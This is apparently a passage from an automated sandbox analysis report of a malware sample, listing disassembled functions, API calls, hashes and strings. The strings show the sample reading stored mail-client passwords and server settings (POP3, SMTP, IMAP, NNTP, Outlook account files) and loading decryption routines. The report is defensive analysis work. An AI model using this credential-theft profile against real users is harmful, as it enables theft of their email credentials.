                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: Library$AddressFreeLoadProc
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 145871493-0
                                                                                                                  • Opcode ID: 368c38512e7cad3fe60d4057cd97a9280d54471de6c65fc2eb8301d482549758
                                                                                                                  • Instruction ID: d196b3276b1a656cda378f5c53e28a4a33de773bbf59b12af1a3f4d2ec041ade
                                                                                                                  • Opcode Fuzzy Hash: 368c38512e7cad3fe60d4057cd97a9280d54471de6c65fc2eb8301d482549758
                                                                                                                  • Instruction Fuzzy Hash: 35F065F8500B039BD7606F34D84879BB3E9AF86310F00453EF961A3281EB38E541CB58
                                                                                                                  Function 00410A6B Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetPrivateProfileIntA.KERNEL32(?,?,?,?), ref: 00410A92
                                                                                                                    • Part of subcall function 00410983: memset.MSVCRT ref: 004109A1
                                                                                                                    • Part of subcall function 00410983: _itoa.MSVCRT ref: 004109B8
                                                                                                                    • Part of subcall function 00410983: WritePrivateProfileStringA.KERNEL32(?,?,00000000), ref: 004109C7
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: PrivateProfile$StringWrite_itoamemset
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4165544737-0
                                                                                                                  • Opcode ID: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                                                                                                  • Instruction ID: e4187046b5889157fb54d5f6e3f9ccfafaefd38d22cef98a7399574687248963
                                                                                                                  • Opcode Fuzzy Hash: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                                                                                                  • Instruction Fuzzy Hash: 3DE0B63204020DBFDF125F90EC01AA97B66FF14355F14845AF95804131D37295B0AF94
                                                                                                                  Function 00404785 Relevance: 1.5, APIs: 1, Instructions: 11COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • FreeLibrary.KERNELBASE(?,?), ref: 0040479A
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: FreeLibrary
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3664257935-0
                                                                                                                  • Opcode ID: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                                                                                                  • Instruction ID: 8a1fb59f4aee03ee333bbcbb21747f572c22b5e480e1b07aa067c0b07a2bbf9c
                                                                                                                  • Opcode Fuzzy Hash: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                                                                                                  • Instruction Fuzzy Hash: D2D012750013118FD7605F14FC4CBA173E8AF41312F1504B8E990A7196C3389540CA58
                                                                                                                  Function 00406D1A Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • CreateFileA.KERNELBASE(?,40000000,00000001,00000000,00000002,00000000,00000000,0040B01C,00000000,00000000,00000000,0044C52F,0044C52F,?,0040CF35,0044C52F), ref: 00406D2C
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: CreateFile
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 823142352-0
                                                                                                                  • Opcode ID: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                                                                                                  • Instruction ID: b62e2d47ef034db7175ca84798afaf0fa2498f7b6fd9cc80310e9c1c0838826b
                                                                                                                  • Opcode Fuzzy Hash: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                                                                                                  • Instruction Fuzzy Hash: 59C012F02503007EFF204F10AC4BF37355DE780700F204420BE00E40E2C2A14C008928
                                                                                                                  Function 004107F1 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • FreeLibrary.KERNELBASE(?,00410825,?,?,?,?,?,?,004041C4), ref: 004107FD
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: FreeLibrary
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3664257935-0
                                                                                                                  • Opcode ID: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                                                                                                  • Instruction ID: 34cea44665fc180de0fd44d6926484b1362fa2b4776eba2aa4e53c033fc5eded
                                                                                                                  • Opcode Fuzzy Hash: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                                                                                                  • Instruction Fuzzy Hash: 8CC04C355107018BE7219B12C949763B7E4BB00316F54C81894A695454D77CE494CE18
                                                                                                                  Function 00410CF3 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • EnumResourceNamesA.KERNEL32(?,?,00410C68,00000000), ref: 00410D02
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: EnumNamesResource
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3334572018-0
                                                                                                                  • Opcode ID: b3588a68add1f6d45fd601d09e3ffe49e4267215e4b3f537158054a437bee868
                                                                                                                  • Instruction ID: 5afcab74deb5f1f746bbc86617496166ce7982b7e139a3a4a0d32d3f52cd2e16
                                                                                                                  • Opcode Fuzzy Hash: b3588a68add1f6d45fd601d09e3ffe49e4267215e4b3f537158054a437bee868
                                                                                                                  • Instruction Fuzzy Hash: 05C09B3119534197C7519F108C4DF1B7695BB59706F144D297191940A4D7514054DE05
                                                                                                                  Function 00407F90 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • FindClose.KERNELBASE(?,00407EAA,?,?,00000000,ACD,0044424D,*.oeaccount,ACD,?,00000104), ref: 00407F9A
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: CloseFind
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1863332320-0
                                                                                                                  • Opcode ID: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                                                                                                                  • Instruction ID: 6a16c08ea37d16c8a4aa15d9076e95747955e6fceefd1cb8b530e80fb020b3ed
                                                                                                                  • Opcode Fuzzy Hash: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                                                                                                                  • Instruction Fuzzy Hash: 6DC092746165029FD22C5F38ECA942A77A1AF4A7303B80F6CE0F3D20F0E73898528A04
                                                                                                                  Function 00410A9C Relevance: 1.5, APIs: 1, Instructions: 7registryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00410E4A,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 00410AAF
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: Open
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 71445658-0
                                                                                                                  • Opcode ID: dc2f54250d009d21d03b042bef434314c6075f5cef50a571bf2f69934a328f8c
                                                                                                                  • Instruction ID: dc05f55a30c25c5fac933af4dde5d03becff9f0601af4caa575784a6c8c77920
                                                                                                                  • Opcode Fuzzy Hash: dc2f54250d009d21d03b042bef434314c6075f5cef50a571bf2f69934a328f8c
                                                                                                                  • Instruction Fuzzy Hash: F4C09B35545301FFDE114F40FD45F09BB61AB84B05F004414B244240B182714414EB17
                                                                                                                  Function 00406F81 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetFileAttributesA.KERNELBASE(?,00409675,?,0040972B,00000000,?,00000000,00000104,?), ref: 00406F85
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: AttributesFile
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3188754299-0
                                                                                                                  • Opcode ID: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                                                                                                                  • Instruction ID: 9c49554ec541f0f53bfa1b31c7f3910b3cb34ca890cc3578c2bd02f8d22bfc28
                                                                                                                  • Opcode Fuzzy Hash: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                                                                                                                  • Instruction Fuzzy Hash: 0CB012B92110004BCB0807349C8904D36505F456317240B3CB033C01F0D720CCA0BE00

                                                                                                                  Non-executed Functions

                                                                                                                  Function 004047CB Relevance: 38.5, APIs: 11, Strings: 11, Instructions: 49libraryloaderCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • LoadLibraryA.KERNEL32(advapi32.dll,?,00404A4C,?,?,0040412F,?,?,004041E4), ref: 004047DA
                                                                                                                  • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 004047EE
                                                                                                                  • GetProcAddress.KERNEL32(0045A9A8,CryptReleaseContext), ref: 004047FA
                                                                                                                  • GetProcAddress.KERNEL32(0045A9A8,CryptCreateHash), ref: 00404806
                                                                                                                  • GetProcAddress.KERNEL32(0045A9A8,CryptGetHashParam), ref: 00404812
                                                                                                                  • GetProcAddress.KERNEL32(0045A9A8,CryptHashData), ref: 0040481E
                                                                                                                  • GetProcAddress.KERNEL32(0045A9A8,CryptDestroyHash), ref: 0040482A
                                                                                                                  • GetProcAddress.KERNEL32(0045A9A8,CryptDecrypt), ref: 00404836
                                                                                                                  • GetProcAddress.KERNEL32(0045A9A8,CryptDeriveKey), ref: 00404842
                                                                                                                  • GetProcAddress.KERNEL32(0045A9A8,CryptImportKey), ref: 0040484E
                                                                                                                  • GetProcAddress.KERNEL32(0045A9A8,CryptDestroyKey), ref: 0040485A
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressProc$LibraryLoad
                                                                                                                  • String ID: CryptAcquireContextA$CryptCreateHash$CryptDecrypt$CryptDeriveKey$CryptDestroyHash$CryptDestroyKey$CryptGetHashParam$CryptHashData$CryptImportKey$CryptReleaseContext$advapi32.dll
                                                                                                                  • API String ID: 2238633743-192783356
                                                                                                                  • Opcode ID: cd939ae61559ee60ed20598dae0af8bfb6f23e93240650da69a7d260c9c9fdd8
                                                                                                                  • Instruction ID: 70faa285c49fb169990c8fbe2f493e995bb0ef80ad344915aa685f594b7479e2
                                                                                                                  • Opcode Fuzzy Hash: cd939ae61559ee60ed20598dae0af8bfb6f23e93240650da69a7d260c9c9fdd8
                                                                                                                  • Instruction Fuzzy Hash: 1101C978E40744AEDB316F76CC09E06BEE1EF9C7047214D2EE1C153650D77AA011DE48
                                                                                                                  Function 00402DB3 Relevance: 29.9, APIs: 5, Strings: 12, Instructions: 153registryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00410E4A,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 00410AAF
                                                                                                                    • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00410E73,?,?,?,?,00410E73,00000000,?,?), ref: 00410AF8
                                                                                                                    • Part of subcall function 00410AB6: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00402936,?,?,?,?,00402936,?,?), ref: 00410AD5
                                                                                                                    • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                                                                                                  • _mbscpy.MSVCRT(?,?), ref: 00402ECA
                                                                                                                  • _mbscpy.MSVCRT(?,?,?,?), ref: 00402EDD
                                                                                                                  • _mbscpy.MSVCRT(?,?), ref: 00402F6A
                                                                                                                  • _mbscpy.MSVCRT(?,?,?,?), ref: 00402F77
                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00402FD1
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: _mbscpy$QueryValue$CloseOpen
                                                                                                                  • String ID: DisplayName$EmailAddress$PopAccount$PopLogSecure$PopPassword$PopPort$PopServer$SMTPAccount$SMTPLogSecure$SMTPPassword$SMTPPort$SMTPServer
                                                                                                                  • API String ID: 52435246-1534328989
                                                                                                                  • Opcode ID: 9103e5d61916334f965bee58fc86a4c23bf3386d7592c631d61422f450fe5fca
                                                                                                                  • Instruction ID: 5dbeba4814e3302d002d767d8bad135afcd275429644e03c8fd50da481ddfc04
                                                                                                                  • Opcode Fuzzy Hash: 9103e5d61916334f965bee58fc86a4c23bf3386d7592c631d61422f450fe5fca
                                                                                                                  • Instruction Fuzzy Hash: 7C512DB1900218BAEB51EB51CD46FDEB77CEF04744F1481A7B908A6191DBB89B84CF98
                                                                                                                  Function 00406DFC Relevance: 16.6, APIs: 11, Instructions: 58clipboardmemoryfileCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • EmptyClipboard.USER32 ref: 00406E06
                                                                                                                    • Part of subcall function 00406D01: CreateFileA.KERNEL32(eBD,80000000,00000001,00000000,00000003,00000000,00000000,004441A1,?,ACD,00444265,?,?,*.oeaccount,ACD,?), ref: 00406D13
                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 00406E23
                                                                                                                  • GlobalAlloc.KERNEL32(00002000,00000001), ref: 00406E34
                                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 00406E41
                                                                                                                  • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406E54
                                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00406E63
                                                                                                                  • SetClipboardData.USER32(00000001,00000000), ref: 00406E6C
                                                                                                                  • GetLastError.KERNEL32 ref: 00406E74
                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00406E80
                                                                                                                  • GetLastError.KERNEL32 ref: 00406E8B
                                                                                                                  • CloseClipboard.USER32 ref: 00406E94
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3604893535-0
                                                                                                                  • Opcode ID: 39ded4ddef3cc4279da07cdcd0aea708266a9fb2ccc9a22b6ca55318489a3f76
                                                                                                                  • Instruction ID: a08a85c5be877f1b118c2cb4fdaf5607b5944e2b5e0e57495ee86e8d77b21b2f
                                                                                                                  • Opcode Fuzzy Hash: 39ded4ddef3cc4279da07cdcd0aea708266a9fb2ccc9a22b6ca55318489a3f76
                                                                                                                  • Instruction Fuzzy Hash: A9114F39501205EFE7506FB4EC8CB9E7BB8EF05315F144175F506E22A1DB3489158AA9
                                                                                                                  Function 004033F0 Relevance: 7.6, Strings: 6, Instructions: 61COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: PrivateProfileString_mbscmpstrlen
                                                                                                                  • String ID: ESMTPPassword$ESMTPUsername$POP3Password$POP3Server$POP3Username$SMTPServer
                                                                                                                  • API String ID: 3963849919-1658304561
                                                                                                                  • Opcode ID: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
                                                                                                                  • Instruction ID: 768c2722c01e59d080de5de3380f4e9b1c28328498c4b4a1784570bb69a0741a
                                                                                                                  • Opcode Fuzzy Hash: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
                                                                                                                  • Instruction Fuzzy Hash: B2213371D0111C6ADB61EB51DC82FEE7B7C9B44705F0400EBBA08B2082DBBC6F898E59
                                                                                                                  Function 004016FD Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 45COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: ??2@??3@memcpymemset
                                                                                                                  • String ID: (yE$(yE$(yE
                                                                                                                  • API String ID: 1865533344-362086290
                                                                                                                  • Opcode ID: 644c9f1e151c47db51b33def850b2c93cd31f25a94bfc045a311b8f4a1212760
                                                                                                                  • Instruction ID: 81f979815271b6a149e92529059c9b1765a635985cdb271dadbae3a2bc10ddb4
                                                                                                                  • Opcode Fuzzy Hash: 644c9f1e151c47db51b33def850b2c93cd31f25a94bfc045a311b8f4a1212760
                                                                                                                  • Instruction Fuzzy Hash: 2D117975900209EFDF119F94C804AAE3BB1FF08326F10806AFD556B2A1C7798915EF69
                                                                                                                  Function 00442D8E Relevance: 191.1, APIs: 8, Strings: 101, Instructions: 307stringCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • strlen.MSVCRT ref: 004431AD
                                                                                                                  • strncmp.MSVCRT ref: 004431BD
                                                                                                                  • memcpy.MSVCRT(?,00000002,00000000,?,?,?,?), ref: 00443239
                                                                                                                  • atoi.MSVCRT(00000000,?,00000002,00000000,?,?,?,?), ref: 0044324A
                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000002,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00443276
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: ByteCharMultiWideatoimemcpystrlenstrncmp
                                                                                                                  • String ID: AElig;$Aacute;$Acirc;$Agrave;$Aring;$Atilde;$Auml;$Ccedil;$ETH;$Eacute;$Ecirc;$Egrave;$Euml;$Iacute;$Icirc;$Igrave;$Iuml;$Ntilde;$Oacute;$Ocirc;$Ograve;$Oslash;$Otilde;$Ouml;$THORN;$Uacute;$Ucirc;$Ugrave;$Uuml;$Yacute;$aacute;$acirc;$acute;$aelig;$agrave;$amp;$apos;$aring;$atilde;$auml;$brvbar;$ccedil;$cedil;$cent;$copy;$curren;$deg;$divide;$eacute;$ecirc;$egrave;$eth;$euml;$frac12;$frac14;$frac34;$gt;$iacute;$icirc;$iexcl;$igrave;$iquest;$iuml;$laquo;$lt;$macr;$micro;$middot;$nbsp;$not;$ntilde;$oacute;$ocirc;$ograve;$ordf;$ordm;$oslash;$otilde;$ouml;$para;$plusmn;$pound;$quot;$raquo;$reg;$sect;$shy;$sup1;$sup2;$sup3;$szlig;$thorn;$times;$uacute;$ucirc;$ugrave;$uml;$uuml;$yacute;$yen;$yuml;
                                                                                                                  • API String ID: 1895597112-3210201812
                                                                                                                  • Opcode ID: e45ea68b9b0540497a6261748f05aaaacbd89a4571b9254cd84bfcdfb871a6d6
                                                                                                                  • Instruction ID: 70136e13f872b1b8ab9f6622f700308096b0d0b5c52b82b67a7483c56e51dea4
                                                                                                                  • Opcode Fuzzy Hash: e45ea68b9b0540497a6261748f05aaaacbd89a4571b9254cd84bfcdfb871a6d6
                                                                                                                  • Instruction Fuzzy Hash: 4AF10B718012589BDB22CF54C8487DEBBB4BB0278BF5485CAD8597B242C7B85B8DCF58
                                                                                                                  Function 00443C71 Relevance: 69.3, APIs: 23, Strings: 23, Instructions: 313stringCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: strcmp$_strcmpi$memcpystrlenstrtoul
                                                                                                                  • String ID: Account_Name$IMAP$IMAP_Port$IMAP_Secure_Connection$IMAP_Server$IMAP_User_Name$NNTP$NNTP_Email_Address$NNTP_Port$NNTP_Secure_Connection$NNTP_Server$NNTP_User_Name$POP3$POP3_Port$POP3_Secure_Connection$POP3_Server$POP3_User_Name$SMTP$SMTP_Email_Address$SMTP_Port$SMTP_Secure_Connection$SMTP_Server$SMTP_User_Name
                                                                                                                  • API String ID: 1714764973-479759155
                                                                                                                  • Opcode ID: d90af57251aac8a93e41199de06fc6046491669e53ae360ecbf61914d176b5eb
                                                                                                                  • Instruction ID: 3e95309f0516475de87f4a3b36a82bfae981417ea13aa6096d07c622cb899a74
                                                                                                                  • Opcode Fuzzy Hash: d90af57251aac8a93e41199de06fc6046491669e53ae360ecbf61914d176b5eb
                                                                                                                  • Instruction Fuzzy Hash: FB91A9726087056AF224BB36DD43B9F33D8EF4071DF20042FF85AA6182EE6DBA05461D
                                                                                                                  Function 0040E934 Relevance: 68.7, APIs: 26, Strings: 13, Instructions: 483COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 0040EBD8
                                                                                                                    • Part of subcall function 00406B6D: memset.MSVCRT ref: 00406B8E
                                                                                                                    • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406B99
                                                                                                                    • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406BA7
                                                                                                                  • memset.MSVCRT ref: 0040EC2B
                                                                                                                  • memset.MSVCRT ref: 0040EC47
                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,0040F26F,000000FF,?,00000104,?,?,?,?,?,?,0040F26F,?,00000000), ref: 0040EC5E
                                                                                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00000104,00000000,00000000,?,?,?,?,?,?,0040F26F,?), ref: 0040EC7D
                                                                                                                  • memset.MSVCRT ref: 0040ECDD
                                                                                                                  • memset.MSVCRT ref: 0040ECF2
                                                                                                                  • _mbscpy.MSVCRT(?,00000000), ref: 0040ED59
                                                                                                                  • _mbscpy.MSVCRT(?,0040F26F), ref: 0040ED6F
                                                                                                                  • _mbscpy.MSVCRT(?,00000000), ref: 0040ED85
                                                                                                                  • _mbscpy.MSVCRT(?,?), ref: 0040ED9B
                                                                                                                  • _mbscpy.MSVCRT(?,?), ref: 0040EDB1
                                                                                                                  • _mbscpy.MSVCRT(?,?), ref: 0040EDC7
                                                                                                                  • memset.MSVCRT ref: 0040EDE1
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                  Similarity
                                                                                                                  • API ID: memset$_mbscpy$ByteCharMultiWidestrlen
                                                                                                                  • String ID: $"$$$$$+$,$/$8$:$e$imap://%s$mailbox://%s$smtp://%s
                                                                                                                  • API String ID: 3137614212-1455797042
                                                                                                                  • Opcode ID: c733d411cb0ddce6aec5d68f75c20dd57854b7067a58d20dabe3d797972b5ab3
                                                                                                                  • Instruction ID: d6da7a2470a9305ce2943739f2db0c21907611b241beb19e2f55b2037bda17a7
                                                                                                                  • Opcode Fuzzy Hash: c733d411cb0ddce6aec5d68f75c20dd57854b7067a58d20dabe3d797972b5ab3
                                                                                                                  • Instruction Fuzzy Hash: 9522A021C047DA9DDB31C6B89C45BCDBB749F16234F0803EAF1A8AB2D2D7345A46CB65
                                                                                                                  Function 0040DD7B Relevance: 66.3, APIs: 28, Strings: 16, Instructions: 303stringCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
